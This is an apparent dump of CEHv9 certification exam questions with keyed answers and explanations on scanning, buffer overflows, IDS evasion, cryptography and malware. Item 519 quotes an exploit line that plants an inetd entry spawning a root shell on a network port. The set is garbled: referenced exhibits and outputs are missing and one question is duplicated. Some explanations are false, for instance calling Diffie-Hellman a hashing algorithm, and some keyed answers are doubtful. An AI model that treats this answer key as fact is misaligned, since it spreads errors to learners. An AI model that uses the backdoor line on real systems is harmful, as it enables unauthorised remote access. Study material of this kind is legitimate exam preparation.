CEHv9 Questions 501-600


562 DRAG DROP A successful attack by a malicious hacker can be divided into five phases. Match the order:

573 How would you permanently wipe the data in the hard disk? A. wipe -fik /dev/hda1 B. erase -fik /dev/hda1 C. delete -fik /dev/hda1 D. secdel -fik /dev/hda1

A Explanation:

595 TCP/IP Session Hijacking is carried out in which OSI layer? A. Transport layer B. Datalink layer C. Physical Layer D. Network Layer

A Explanation:

512 Blake is in charge of securing all 20 of his company's servers. He has enabled hardware and software firewalls, hardened the operating systems and disabled all unnecessary services on all the servers. Unfortunately, there is proprietary AS400 emulation software that must run on one of the servers that requires the telnet service to function properly. Blake is especially concerned about this since telnet can be a very large security risk in an organization. Blake is concerned about how his particular server might look to an outside attacker, so he decides to perform some footprinting, scanning and penetration tests on the server. Blake telnets into the server and types the following command: HEAD / HTTP/1.0 After pressing enter twice, Blake gets the following results: What has Blake just accomplished? A. Grabbed the banner B. Downloaded a file to his local computer C. Submitted a remote command to crash the server D. Poisoned the local DNS cache of the server

A Explanation:

586 More sophisticated IDSs look for common shellcode signatures. But even these systems can be bypassed by using polymorphic shellcode. This is a technique common among virus writers - it basically hides the true nature of the shellcode in different disguises. How does a polymorphic shellcode work? A. They convert the shellcode into Unicode, using a loader to convert it back to machine code and then executing it B. They compress shellcode into normal instructions, uncompress the shellcode using loader code and then execute the shellcode C. They reverse the working instructions into the opposite order by masking the IDS signatures D. They encrypt the shellcode by XORing values over the shellcode, using loader code to decrypt the shellcode, and then executing the decrypted shellcode

A Explanation: In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode.

574 Theresa is an IT security analyst working for the United Kingdom Internet Crimes Bureau in London. Theresa has been assigned to the software piracy division, which focuses on taking down individuals and organized groups that distribute copyrighted software illegally. Theresa and her division have been responsible for taking down over 2,000 FTP sites hosting copyrighted software. Theresa's supervisor now wants her to focus on finding and taking down websites that host illegal pirated software. What are these sites called that Theresa has been tasked with taking down? A. These sites that host illegal copyrighted software are called Warez sites B. These sites that Theresa has been tasked to take down are called uTorrent sites C. These websites are referred to as Dark Web sites D. Websites that host illegal pirated versions of software are called Back Door sites

A Explanation: The Warez scene, often referred to as The Scene (often capitalized) is a term of self-reference used by a community that specializes in the underground distribution of pirated content, typically software but increasingly including movies and music.

515 Angela is trying to access an education website that requires a username and password to log in. When Angela clicks on the link to access the login page, she gets an error message stating that the page can't be reached. She contacts the website's support team and they report that no one else is having any issues with the site. After handing the issue over to her company's IT department, it is found that the education website requires that any computer accessing the site must be able to respond to a ping from the education website's server. Since Angela's computer is behind a corporate firewall, her computer can't ping the education website back. What can Angela's IT department do to get access to the education website? A. Change the IP on Angela's computer to an address outside the firewall B. Change the settings on the firewall to allow all incoming traffic on port 80 C. Change the settings on the firewall to allow all outbound traffic on port 80 D. Use an Internet browser other than the one that Angela is currently using

A Explanation: Allowing traffic to and from port 80 will not help as this will be UDP or TCP traffic and ping uses ICMP. The browser used by the user will not make any difference. The only alternative here that would solve the problem is to move the computer to outside the firewall.

553 Microsoft Authenticode technology is used for: A. Digitally signing ActiveX controls B. Digitally signing SSL certificates C. Digitally signing JavaScript files D. Digitally signing Java applets

A Explanation: Authenticode identifies the publisher of signed software and verifies that it hasn't been tampered with, before users download software to their PCs. As a result, end users can make a more informed decision as to whether or not to download code. Authenticode relies on digital certificates and is based on specifications that have been used successfully in the industry for some time, including Public Key Cryptography Standards (PKCS) #7 (encrypted key specification), PKCS #10 (certificate request formats), X.509 (certificate specification), and the Secure Hash Algorithm (SHA) and MD5 hash algorithms.

521 The programmers on your team are analyzing the free, open source software being used to run FTP services on a server. They notice that there is an excessive number of fgets() and gets() calls in the source code. These C++ functions do not check bounds. What kind of attack is this program susceptible to? A. Buffer Overflow B. Denial of Service C. Shatter Attack D. Password Attack

A Explanation: C users must avoid using dangerous functions that do not check bounds unless they've ensured that the bounds will never get exceeded. A buffer overflow occurs when you write a set of values (usually a string of characters) into a fixed length buffer and write at least one value outside that buffer's boundaries (usually past its end). A buffer overflow can occur when reading input from the user into a buffer, but it can also occur during other kinds of processing in a program.

527 StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft's /GS option use _____ defense against buffer overflow attacks. A. Canary B. Hex editing C. Format checking D. Non-executing stack

A Explanation: Canaries or canary words are known values that are placed between a buffer and control data on the stack to monitor buffer overflows. When the buffer overflows, it will clobber the canary, making the overflow evident. This is a reference to the historic practice of using canaries in coal mines, since they would be affected by toxic gases earlier than the miners, thus providing a biological warning system.

533 In a buffer overflow exploit, which of the following registers gets overwritten with the return address of the exploit code? A. EIP B. ESP C. EAP D. EEP

A Explanation: EIP is the instruction pointer, a register that points to the next instruction to be executed.

549 One of the most common and the best way of cracking RSA encryption is to begin by deriving the two prime numbers which are used in the RSA PKI mathematical process. If the two numbers p and q are discovered through a _________________ process, then the private key can be derived. A. Factorization B. Prime Detection C. Hashing D. Brute-forcing

A Explanation: In April 1994, an international cooperative group of mathematicians and computer scientists solved a 17-year-old challenge problem, the factoring of a 129-digit number, called RSA-129, into two primes. That is, RSA-129 = 114381625757888867669235779976146612010218296721242362562561842935706935245733897830597123563958705058989075147599290026879543541 = 3490529510847650949147849619903898133417764638493387843990820577 times 32769132993266709549961988190834461413177642967992942539798288533. See more at http://en.wikipedia.org/wiki/RSA_Factoring_Challenge

554 One of the most common and the best way of cracking RSA encryption is to begin by deriving the two prime numbers which are used in the RSA PKI mathematical process. If the two numbers p and q are discovered through a _________________ process, then the private key can be derived. A. Factorization B. Prime Detection C. Hashing D. Brute-forcing

A Explanation: In April 1994, an international cooperative group of mathematicians and computer scientists solved a 17-year-old challenge problem, the factoring of a 129-digit number, called RSA-129, into two primes. That is, RSA-129 = 114381625757888867669235779976146612010218296721242362562561842935706935245733897830597123563958705058989075147599290026879543541 = 3490529510847650949147849619903898133417764638493387843990820577 times 32769132993266709549961988190834461413177642967992942539798288533. See more at http://en.wikipedia.org/wiki/RSA_Factoring_Challenge

569 If you perform a port scan with a TCP ACK packet, what should an OPEN port return? A. RST B. No Reply C. SYN/ACK D. FIN

A Explanation: Open ports return RST to an ACK scan.

551 Richard is a network administrator working at a student loan company in Iowa. This company processes over 20,000 student loans a year from colleges all over the state. Most communication between the company, schools and lenders is carried out through email. Because of privacy laws that are in the process of being implemented, Richard wants to get ahead of the game and become compliant before any sort of auditing occurs. Much of the email communication used at his company contains sensitive information such as social security numbers. For this reason, Richard wants to utilize email encryption agency-wide. The only problem for Richard is that his department only has a couple of servers and they are utilized to their full capacity. Since a server-based PKI is not an option for him, he is looking for a low/no cost solution to encrypt email. What should Richard use? A. PGP B. RSA C. 3DES D. OTP

A Explanation: PGP (Pretty Good Privacy) is an encryption program used for secure transmission of files and e-mails. It adapts public-key encryption technology, in which pairs of keys are used to maintain secure communication. For PGP-based communication both the sender and receiver should have public and private key pairs. The sender's public key should be distributed to the receiver. Similarly, the receiver's public key should be distributed to the sender. When sending a message or a file, the sender can sign using his private key. Also, the sender's private key is never distributed. All encryption is done on the workstation sending the e-mail.

535 Which programming language is NOT vulnerable to buffer overflow attacks? A. Java B. ActiveX C. C++ D. Assembly Language

A Explanation: Perl and Java have boundary checking, hence buffer overflows don't occur. On the other hand, Perl and Java don't offer access to the system that is as deep as some programs need.

517 This IDS defeating technique works by splitting a datagram (or packet) into multiple fragments so that the IDS will not spot the true nature of the fully assembled datagram. The datagram is not reassembled until it reaches its final destination. It would be a processor-intensive task for an IDS to reassemble all fragments itself, and on a busy system the packet will slip through the IDS onto the network. What is this technique called? A. IP Fragmentation or Session Splicing B. IP Routing or Packet Dropping C. IDS Spoofing or Session Assembly D. IP Splicing or Packet Reassembly

A Explanation: The basic premise behind session splicing, or IP Fragmentation, is to deliver the payload over multiple packets, thus defeating simple pattern matching without session reconstruction. This payload can be delivered in many different manners and even spread out over a long period of time. Currently, Whisker and Nessus have session splicing capabilities, and other tools exist in the wild.

507 Exhibit: Given the following extract from the snort log on a honeypot, what service is being exploited? A. FTP B. SSH C. Telnet D. SMTP

A Explanation: The connection is done to 172.16.1.104:21.

532 When writing shellcodes, you must avoid _________________ because these will end the string. A. Null Bytes B. Root Bytes C. Char Bytes D. Unicode Bytes

A Explanation: The null character (also null terminator) is a character with the value zero, present in the ASCII and Unicode character sets, and available in nearly all mainstream programming languages. The original meaning of this character was like NOP — when sent to a printer or a terminal, it does nothing (some terminals, however, incorrectly display it as space). Strings ending in a null character are said to be null-terminated.

591 WWW wanderers or spiders are programs that traverse many pages in the World Wide Web by recursively retrieving linked pages. Search engines like Google frequently spider web pages for indexing. How will you stop web spiders from crawling certain directories on your website? A. Place a robots.txt file in the root of your website with a listing of directories that you don't want to be crawled B. Place authentication on root directories that will prevent crawling from these spiders C. Place "HTTP:NO CRAWL" on the html pages that you don't want the crawlers to index D. Enable SSL on the restricted directories which will block these spiders from crawling

A Explanation: WWW Robots (also called wanderers or spiders) are programs that traverse many pages in the World Wide Web by recursively retrieving linked pages. The method used to exclude robots from a server is to create a file on the server which specifies an access policy for robots. This file must be accessible via HTTP on the local URL "/robots.txt". http://www.robotstxt.org/orig.html#format

519 Study the following exploit code taken from a Linux machine and answer the questions below: echo "ingreslock stream tcp nowait root /bin/sh sh -I" > /tmp/x; /usr/sbin/inetd -s /tmp/x; sleep 10; /bin/ rm -f /tmp/x AAAA...AAA In the above exploit code, the command "/bin/sh sh -I" is given. What is the purpose, and why is 'sh' shown twice? A. The command /bin/sh sh -i appearing in the exploit code is actually part of an inetd configuration file. B. The length of such a buffer overflow exploit makes it prohibitive for a user to enter manually. The second 'sh' automates this function. C. It checks for the presence of a codeword (setting the environment variable) among the environment variables. D. It is a giveaway by the attacker that he is a script kiddy.

A Explanation: What's going on in the above question is that the attacker is trying to write to the unix file /tmp/x (his inetd.conf replacement config) -- he is attempting to add a service called ingresslock (which doesn't exist), which is "apparently" supposed to spawn a shell on the port specified by /etc/services for the service "ingresslock". ingresslock is a non-existent service, and if an attempt were made to respawn inetd, the service would error out on that line (he would have to add the service to /etc/services to suppress the error). Now the question is asking about /bin/sh sh -i, which produces an error that should read "sh: /bin/sh: cannot execute binary file"; the -i option places the shell in interactive mode and cannot be used to respawn itself.

568 If you receive a RST packet while doing an ACK scan, it indicates that the port is open. (True/False) A. True B. False

A Explanation: When an ACK is sent to an open port, a RST is returned.

505 Which of the following countermeasures can specifically protect against both the MAC Flood and MAC Spoofing attacks? A. Port Security B. Switch Mapping C. Port Reconfiguring D. Multiple Recognition

A Explanation: With Port Security the switch keeps track of which MAC addresses are allowed to send traffic on a port.

596 Reflective DDoS attacks do not send traffic directly at the targeted host. Instead, they usually spoof the originating IP addresses and send the requests to the reflectors. These reflectors (usually routers or high-powered servers with a large amount of network resources at their disposal) then reply to the spoofed traffic by sending loads and loads of data to the final target. How would you detect these reflectors on your network? A. Run the floodnet tool to detect these reflectors B. Look for the banner text by running the Zombie Zapper tool C. Run a vulnerability scanner on your network to detect these reflectors D. Scan the network using Nmap for the services used by these reflectors

A Explanation: http://www.exterminate-it.com/malpedia/remove-floodnet

518 John runs a Web Server, IDS and firewall on his network. Recently his Web Server has been under constant hacking attacks. He looks up the IDS log files and sees no intrusion attempts, but the web server constantly locks up and needs rebooting due to various brute force and buffer overflow attacks, and still the IDS alerts no intrusion whatsoever. John becomes suspicious and views the firewall logs, and he notices huge numbers of SSL connections constantly hitting the web server. Hackers have been using the encrypted HTTPS protocol to send exploits to the web server, and that was the reason the IDS did not detect the intrusions. How would John protect his network from these types of attacks? A. Install a proxy server and terminate SSL at the proxy B. Install a hardware SSL "accelerator" and terminate SSL at this layer C. Enable the IDS to filter encrypted HTTPS traffic D. Enable the firewall to filter encrypted HTTPS traffic

A,B Explanation: By terminating the SSL connection at a proxy or an SSL accelerator and then using clear text for the distance between the proxy/accelerator and the server, you make it possible for the IDS to scan the traffic.

531 Which of the following built-in C/C++ functions should you avoid to prevent your program from buffer overflow attacks? A. strcpy() B. strcat() C. streadd() D. strscock()

A,B,C Explanation: When hunting buffer overflows, the first thing to look for is functions which write into arrays without any way to know the amount of space available. If you get to define the function, you can pass a length parameter in, or ensure that every array you ever pass to it is at least as big as the hard-coded maximum amount it will write. If you're using a function someone else (like, say, the compiler vendor) has provided then avoiding functions like gets(), which take some amount of data over which you have no control and stuff it into arrays they can never know the size of, is a good start. Make sure that functions like the str...() family which expect NUL-terminated strings actually get them - store a '\0' in the last element of each array involved just before you call the function, if necessary. Strscock() is not a valid C/C++ function.

525 Buffer X in an accounting application module for a company can contain 200 characters. The programmer makes an assumption that 200 characters are more than enough. Because there were no proper boundary checks being conducted, Dave decided to insert 400 characters into the 200-character buffer, which overflows the buffer. Below is the code snippet: void func(void) { int I; char buffer[200]; for (I=0; I<400; I++) buffer[I] = 'A'; return; } How can you protect/fix the problem of your application as shown above? (Choose two) A. Because the counter starts with 0, we would stop when the counter is less than 200. B. Because the counter starts with 0, we would stop when the counter is more than 200. C. Add a separate statement to signify that if we have written 200 characters to the buffer, the stack should stop because it cannot hold any more data. D. Add a separate statement to signify that if we have written less than 200 characters to the buffer, the stack should stop because it cannot hold any more data.

A,C Explanation: I=199 would be character number 200. The stack holds exactly 200 characters, so there is no need to stop before 200.

534 Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The programmer makes an assumption that 200 characters are more than enough. Because there were no proper boundary checks being conducted, Bob decided to insert 400 characters into the 200-character buffer. (Overflows the buffer). Below is the code snippet. How can you protect/fix the problem of your application as shown above? A. Because the counter starts with 0, we would stop when the counter is less than 200 B. Because the counter starts with 0, we would stop when the counter is more than 200 C. Add a separate statement to signify that if we have written 200 characters to the buffer, the stack should stop because it can't hold any more data D. Add a separate statement to signify that if we have written less than 200 characters to the buffer, the stack should stop because it can't hold any more data

A,C Explanation: I=199 would be character number 200. The stack holds exactly 200 characters, so there is no need to stop before 200.

582 An SNMP scanner is a program that sends SNMP requests to multiple IP addresses, trying different community strings and waiting for a reply. Unfortunately, SNMP servers don't respond to requests with invalid community strings and the underlying protocol does not reliably report closed ports. This means that 'no response' from the probed IP address can mean which of the following: (Select up to 3) A. Invalid community string B. S-AUTH protocol is running on the SNMP server C. Machine unreachable D. SNMP server not running

A,C,D Explanation: http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol

508 There are two types of honeypots: high and low interaction. Which of these describes a low interaction honeypot? Select the best answers. A. Emulators of vulnerable programs B. More likely to be penetrated C. Easier to deploy and maintain D. Tend to be used for production E. More detectable F. Tend to be used for research

A,C,D,E Explanation: A low interaction honeypot would have emulators of vulnerable programs, not the real programs. A high interaction honeypot is more likely to be penetrated as it is running the real program and is more vulnerable than an emulator. Low interaction honeypots are easier to deploy and maintain. Usually you would just use a program that is already available for download and install it. Hackers don't usually crash or destroy these types of programs and it would require little maintenance. A low interaction honeypot tends to be used for production. Low interaction honeypots are more detectable because you are using emulators of the real programs. Many hackers will see this and realize that they are in a honeypot. A high interaction honeypot tends to be used for research.

565 You just purchased the latest DELL computer, which comes pre-installed with Windows XP, McAfee antivirus software and a host of other applications. You want to connect an Ethernet cable to your cable modem and start using the computer immediately. Windows is dangerously insecure when unpacked from the box, and there are a few things that you must do before you use it. A. A new installation of Windows should be patched by installing the latest service packs and hotfixes B. Enable the "guest" account C. Install a personal firewall and lock down unused ports from connecting to your computer D. Install the latest signatures for the antivirus software E. Configure "Windows Update" to automatic F. Create a non-admin user with a complex password and log in to this account

A,C,D,E,F Explanation: The guest account is a possible vulnerability to your system, so you should not enable it unless needed. Otherwise you should perform all other actions mentioned in order to have a secure system.

511 What is the advantage in encrypting the communication between the agent and the monitor in an Intrusion Detection System? A. Encryption of agent communications will conceal the presence of the agents B. The monitor will know if counterfeit messages are being generated because they will not be encrypted C. Alerts are sent to the monitor when a potential intrusion is detected D. An intruder could intercept and delete data or alerts and the intrusion can go undetected

B Explanation:

561 Which type of attack is port scanning? A. Web server attack B. Information gathering C. Unauthorized access D. Denial of service attack

B Explanation:

580 Giles is the network administrator for his company, a graphics design company based in Dallas. Most of the network is comprised of Windows servers and workstations, except for some designers that prefer to use MACs. These MAC users are running on the MAC OS X operating system. These MAC users also utilize iChat to talk between each other. Tommy, one of these MAC users, calls Giles and says that his computer is running very slow. Giles then gets more calls from the other MAC users saying they are receiving instant messages from Tommy even when he says he is not on his computer. Giles immediately unplugs Tommy's computer from the network to take a closer look. He opens iChat on Tommy's computer and it says that it sent a file called latestpics.tgz to all the other MAC users. Tommy says he never sent those files. Giles also sees that many of the computer's applications appear to be altered. The path where the files should be has an altered file and the original application is stored in the file's resource fork. What has Giles discovered on Tommy's computer? A. He has discovered OSX/Chat-burner virus on Tommy's computer B. Giles has found the OSX/Leap-A virus on Tommy's computer C. This behavior is indicative of the OSX/Inqtana.A virus D. On Tommy's computer, Giles has discovered an apparent infection of the OSX/Transmitter.B virus

B Explanation: OSX.Leap.A is a worm that targets installs of Macintosh OS X and spreads via iChat Instant Messenger program. http://www.symantec.com/security_response/writeup.jsp?docid=2006-021614-4006-99

577 Theresa is the chief information security officer for her company, a large shipping company based out of New York City. In the past, Theresa and her IT employees manually checked the status of client computers on the network to see if they had the most recent Microsoft updates. Now that the company has added over 100 more clients to accommodate new departments, Theresa must find some kind of tool to see whether the clients are up-to-date or not. Theresa decides to use Qfecheck to monitor all client computers. When Theresa runs the tool, she is repeatedly told that the software does not have the proper permissions to scan. Theresa is worried that the operating system hardening that she performs on all clients is keeping the software from scanning the necessary registry keys on the client computers. What registry key permission should Theresa check to ensure that Qfecheck runs properly? A. In order for Qfecheck to run properly, it must have enough permission to read B. She needs to check the permissions of the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates registry key C. Theresa needs to look over the permissions of the registry key D. The registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Microsoft must be checked

B Explanation: Qfecheck checks the registry key HKLM\Software\Microsoft\Updates

579 Justine is the systems administrator for her company, an international shipping company with offices all over the world. Recent US regulations have forced the company to implement stronger and more secure means of communication. Justine and other administrators have been put in charge of securing the company's digital communication lines. After implementing email encryption, Justine now needs to implement robust digital signatures to ensure data authenticity and reliability. Justine has decided to implement digital signatures which are a variant of DSA and that operate on elliptic curve groups. These signatures are more efficient than DSA and are not vulnerable to number field sieve attacks. What type of signature has Justine decided to implement? A. She has decided to implement ElGamal signatures since they offer more reliability than the typical DSA signatures B. Justine has decided to use ECDSA signatures since they are more efficient than DSA signatures C. Justine is now utilizing SHA-1 with RSA signatures to help ensure data reliability D. These types of signatures that Justine has decided to use are called RSA-PSS signatures

B Explanation: The Elliptic Curve Digital Signature Algorithm (ECDSA) is a variant of the Digital Signature Algorithm (DSA) which uses elliptic curve cryptography. http://en.wikipedia.org/wiki/Elliptic_Curve_DSA

584 James is an IT security consultant as well as a certified ethical hacker. James has been asked to audit the network security of Yerta Manufacturing, a tool manufacturing company in Phoenix. James performs some initial external tests and then begins testing the security from inside the company's network. James finds some big problems right away; a number of users that are working on Windows XP computers have saved their usernames and passwords used to connect to servers on the network. This way, those users do not have to type in their credentials every time they want access to a server. James tells the IT manager of Yerta Manufacturing about this, and the manager does not believe this is possible on Windows XP. To prove his point, James has a user logon to a computer and then James types in a command that brings up a window that says "Stored User Names and Passwords". What command did James type in to get this window to come up? A. To bring up this stored user names and passwords window, James typed in "rundll32.exe storedpwd.dll, ShowWindow" B. James had to type in "rundll32.exe keymgr.dll, KRShowKeyMgr" to get the window to pop up C. James typed in the command "rundll32.exe storedpwd.dll" to get the Stored User Names and Passwords window to come up D. The command to bring up this window is "KRShowKeyMgr"

B Explanation: The Stored User Names and Passwords applet lets you assign user names and passwords to use when needing to authenticate yourself to services in domains other than the one you are currently logged into. The normal way of running this applet can be difficult to find quickly, so here is a way to launch it using a desktop shortcut using the rundll32.exe program: Click on START - RUN and type the following (followed by ENTER): rundll32.exe keymgr.dll,KRShowKeyMgr http://www.tweakxp.com/article37352.aspx

585 Bob was frustrated with his competitor, Brownies Inc., and decided to launch an attack that would result in serious financial losses. He planned the attack carefully and carried out the attack at the appropriate moment. Meanwhile, Trent, an administrator at Brownies Inc., realized that their main financial transaction server had been attacked. As a result of the attack, the server crashed and Trent needed to reboot the system, as no one was able to access the resources of the company. This process involves human interaction to fix it. What kind of Denial of Service attack was best illustrated in the scenario above? A. DOS attacks which involve flooding a network or system B. DOS attacks which involve crashing a network or system C. DOS attacks which are done accidentally or deliberately D. Simple DDOS attack

B Explanation: This is not a DDOS; there is only one person involved as the attacker.

552 A digital signature is simply a message that is encrypted with the public key instead of the private key. A. True B. False

B Explanation: Digital signatures enable the recipient of information to verify the authenticity of the information's origin, and also verify that the information is intact. Thus, public key digital signatures provide authentication and data integrity. A digital signature also provides non-repudiation, which means that it prevents the sender from claiming that he or she did not actually send the information. Instead of encrypting information using someone else's public key, you encrypt it with your private key. If the information can be decrypted with your public key, then it must have originated with you.

563 Oregon Corp is fighting a litigation suit with Scamster Inc. Oregon has assigned a private investigative agency to go through garbage, recycled paper, and other rubbish at Scamster's office site in order to find relevant information. What would you call this kind of activity? A. Garbage Scooping B. Dumpster Diving C. Scanning D. CI Gathering

B Explanation: Dumpster diving is the colloquial name for going through somebody's garbage -- which will usually be in dumpsters for large organizations. This is a powerful tactic because it is protected by social taboos. Trash is bad, and once it goes into the trash, something is best forgotten. The reality is that most company trash is fairly clean, and provides a gold mine of information.

571 What is the name of the software tool used to crack a single account on Netware Servers using a dictionary attack? A. NPWCrack B. NWPCrack C. NovCrack D. CrackNov E. GetCrack

B Explanation: NWPCrack is the software tool used to crack single accounts on Netware servers.

536 Jane wishes to forward X-Windows traffic to a remote host as well as POP3 traffic. She is worried that adversaries might be monitoring the communication link and could inspect captured traffic. She would like to tunnel the information to the remote end but does not have VPN capabilities to do so. Which of the following tools can she use to protect the link? A. MD5 B. SSH C. RSA D. PGP

B Explanation: Port forwarding, or tunneling, is a way to forward otherwise insecure TCP traffic through SSH Secure Shell. You can secure for example POP3, SMTP and HTTP connections that would otherwise be insecure.

528 A simple compiler technique used by programmers is to add a terminator 'canary word' containing four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are terminated. If the canary word has been altered when the function returns, and the program responds by emitting an intruder alert into syslog and then halts, what does it indicate? A. The system has crashed B. A buffer overflow attack has been attempted C. A buffer overflow attack has already occurred D. A firewall has been breached and this is logged E. An intrusion detection system has been triggered

B Explanation: Terminator Canaries are based on the observation that most buffer overflows and stack smash attacks are based on certain string operations which end at terminators. The reaction to this observation is that the canaries are built of NULL terminators, CR, LF, and -1. The undesirable result is that the canary is known.

548 Bob is a Junior Administrator at ABC Company. He is installing RedHat Enterprise Linux on his machine. At installation time, he removed the "Use MD5" option. What will be the hashing standard? A. MD2 B. DES C. 3DES D. RSA

B Explanation: crypt() will return an encrypted string using the standard Unix DES-based encryption algorithm or alternative algorithms that may be available on the system. By removing the "Use MD5" option Bob forces crypt() to revert to DES encryption.

589 You are configuring the security options of your mail server and you would like to block certain file attachments to prevent viruses and malware from entering the users' inboxes. Which of the following file formats will you block? (Select up to 6) A. .txt B. .vbs C. .pif D. .jpg E. .gif F. .com G. .htm H. .rar I. .scr J. .exe

B,C,E,F,I,J Explanation: http://office.microsoft.com/en-us/outlook/HP030850041033.aspx

547 There is some dispute between two network administrators at your company. Your boss asks you to come and meet with the administrators to set the record straight. Which of these are true about PKI and encryption? Select the best answers. A. PKI provides data with encryption, compression, and restorability. B. Public-key encryption was invented in 1976 by Whitfield Diffie and Martin Hellman. C. When it comes to eCommerce, as long as you have authenticity, and authenticity, you do not need encryption. D. RSA is a type of encryption.

B,D Explanation: PKI provides confidentiality, integrity, and authenticity of the messages exchanged between these two types of systems. The 3rd party provides the public key and the receiver verifies the message with a combination of the private and public key. Public-key encryption WAS invented in 1976 by Whitfield Diffie and Martin Hellman. The famous hashing algorithm Diffie-Hellman was named after them. The RSA Algorithm was created by the RSA Security company, which has also created other widely used encryption algorithms.

509 An Evil Cracker is attempting to penetrate your private network security. To do this, he must not be seen by your IDS, as it may take action to stop him. What tool might he use to bypass the IDS? Select the best answer. A. Firewalk B. Manhunt C. Fragrouter D. Fragids

C Explanation: Firewalking is a way to disguise a portscan. Thus, firewalking is not a tool, but a method of conducting a port scan in which it can be hidden from some firewalls. Symantec ManHunt is an IDS, not a tool to evade an IDS. Fragrouter is a tool that can take IP traffic and fragment it into multiple pieces. There is a legitimate reason that fragmentation is done, but it is also a technique that can help an attacker to evade detection, while Fragids is a made-up tool and does not exist.

556 Joel and her team have been going through tons of garbage, recycled paper, and other rubbish in order to find some information about the target they are attempting to penetrate. What would you call this kind of activity? A. CI Gathering B. Scanning C. Dumpster Diving D. Garbage Scooping

C Explanation:

557 A client has approached you with penetration test requirements. They are concerned with the possibility of external threat, and have invested considerable resources in protecting their Internet exposure. However, their main concern is the possibility of an employee elevating his/her privileges and gaining access to information outside of their respective department. What kind of penetration test would you recommend that would best address the client's concern? A. A Black Box test B. A Black Hat test C. A Grey Box test D. A Grey Hat test E. A White Box test F. A White Hat test

C Explanation:

558 Which of the following should be performed first in any penetration test? A. System identification B. Intrusion Detection System testing C. Passive information gathering D. Firewall testing

C Explanation:

593 Jeffery works at a large financial firm in Dallas, Texas as a securities analyst. Last week, the IT department of his company installed a wireless network throughout the building. The problem is that they are only going to make it available to upper management and the IT department. Most employees don't have a problem with this since they have no need for wireless networking, but Jeffery would really like to use wireless since he has a personal laptop that he works from as much as he can. Jeffery asks the IT manager if he could be allowed to use the wireless network but he is turned down. Jeffery is not satisfied, so he brings his laptop in to work late one night and tries to get access to the network. Jeffery uses the wireless utility on his laptop, but cannot see any wireless networks available. After about an hour of trying to figure it out, Jeffery cannot get on the company's wireless network. Discouraged, Jeffery leaves the office and goes home. The next day, Jeffery calls his friend who works with computers. His friend suggests that his IT department might have turned off SSID broadcasting, and that is why he could not see any wireless networks. How would Jeffrey access the wireless network? A. Run WEPCrack tool and brute force the SSID hashes B. Jam the wireless signal by launching denial of service attack C. Sniff the wireless network and capture the SSID that is transmitted over the wire in plaintext D. Attempt to connect using wireless device default SSIDs

C Explanation:

600 Lyle is a systems security analyst for Gusteffson & Sons, a large law firm in Beverly Hills. Lyle's responsibilities include network vulnerability scans, Antivirus monitoring, and IDS monitoring. Lyle receives a help desk call from a user in the Accounting department. This user reports that his computer is running very slow all day long and it sometimes gives him an error message that the hard drive is almost full. Lyle runs a scan on the computer with the company antivirus software and finds nothing. Lyle downloads another free antivirus application and scans the computer again. This time a virus is found on the computer. The infected files appear to be Microsoft Office files since they are in the same directory as that software. Lyle does some research and finds that this virus disguises itself as a genuine application on a computer to hide from antivirus software. What type of virus has Lyle found on this computer? A. This type of virus that Lyle has found is called a cavity virus. B. Lyle has discovered a camouflage virus on the computer. C. By using the free antivirus software, Lyle has found a tunneling virus on the computer. D. Lyle has found a polymorphic virus on this computer

C Explanation:

576 Marshall is the information security manager for his company. Marshall was just hired on two months ago after the last information security manager retired. Since the last manager did not implement or even write IT policies, Marshall has begun writing IT security policies to cover every conceivable aspect. Marshall's supervisor has informed him that while most employees will be under one set of policies, ten other employees will be under another since they work on computers in publicly-accessible areas. Per his supervisor, Marshall has written two sets of policies. For the users working on publicly-accessible computers, their policies state that everything is forbidden. They are not allowed to browse the Internet or even use email. The only thing they can use is their work related applications like Word and Excel. What types of policies has Marshall written for the users working on computers in the publicly-accessible areas? A. He has implemented Permissive policies for the users working on public computers B. These types of policies would be considered Promiscuous policies C. He has written Paranoid policies for these users in public areas D. Marshall has created Prudent policies for the computer users in publicly-accessible areas

C Explanation: The policy says that everything is forbidden, which means that a Paranoid Policy has been implemented.

597 When a malicious hacker identifies a target and wants to eventually compromise this target, what would be the first step the attacker would perform? A. Cover his tracks by eradicating the log files B. Gain access to the remote computer for identification of venue of attacks C. Perform a reconnaissance of the remote target for identification of venue of attacks D. Always starts with a scan in order to quickly identify venue of attacks

C Explanation:

599 Attacker forges a TCP/IP packet, which causes the victim to try opening a connection with itself. This causes the system to go into an infinite loop trying to resolve this unexpected connection. Eventually, the connection times out, but during this resolution, the machine appears to hang or become very slow. The attacker sends such packets on a regular basis to slow down the system. Unpatched Windows XP and Windows Server 2003 machines are vulnerable to these attacks. What type of Denial of Service attack is represented here? A. SMURF Attacks B. Targa attacks C. LAND attacks D. SYN Flood attacks

C Explanation: The attack involves sending a spoofed TCP SYN packet (connection initiation) with the target host's IP address and an open port as both source and destination. The reason a LAND attack works is because it causes the machine to reply to itself continuously. http://en.wikipedia.org/wiki/LAND

583 Charlie is an IT security consultant that owns his own business in Denver. Charlie has recently been hired by Fleishman Robotics, a mechanical engineering company also in Denver. After signing service level agreements and other contract papers, Charlie asks to look over the current company security policies. Based on these policies, Charlie compares the policies against what is actually in place to secure the company's network. From this information, Charlie is able to produce a report to give to company executives showing which areas the company is lacking in. This report then becomes the basis for all of Charlie's remaining tests. What type of initial analysis has Charlie performed to show the company which areas it needs improvements in? A. Charlie has performed a BREACH analysis; showing the company where its weak points are B. This analysis would be considered a vulnerability analysis C. This type of analysis is called GAP analysis D. This initial analysis performed by Charlie is called an Executive Summary

C Explanation: In business and economics, gap analysis is a tool that helps a company to compare its actual performance with its potential performance. At its core are two questions: "Where are we?" and "Where do we want to be?". http://en.wikipedia.org/wiki/Gap_analysis

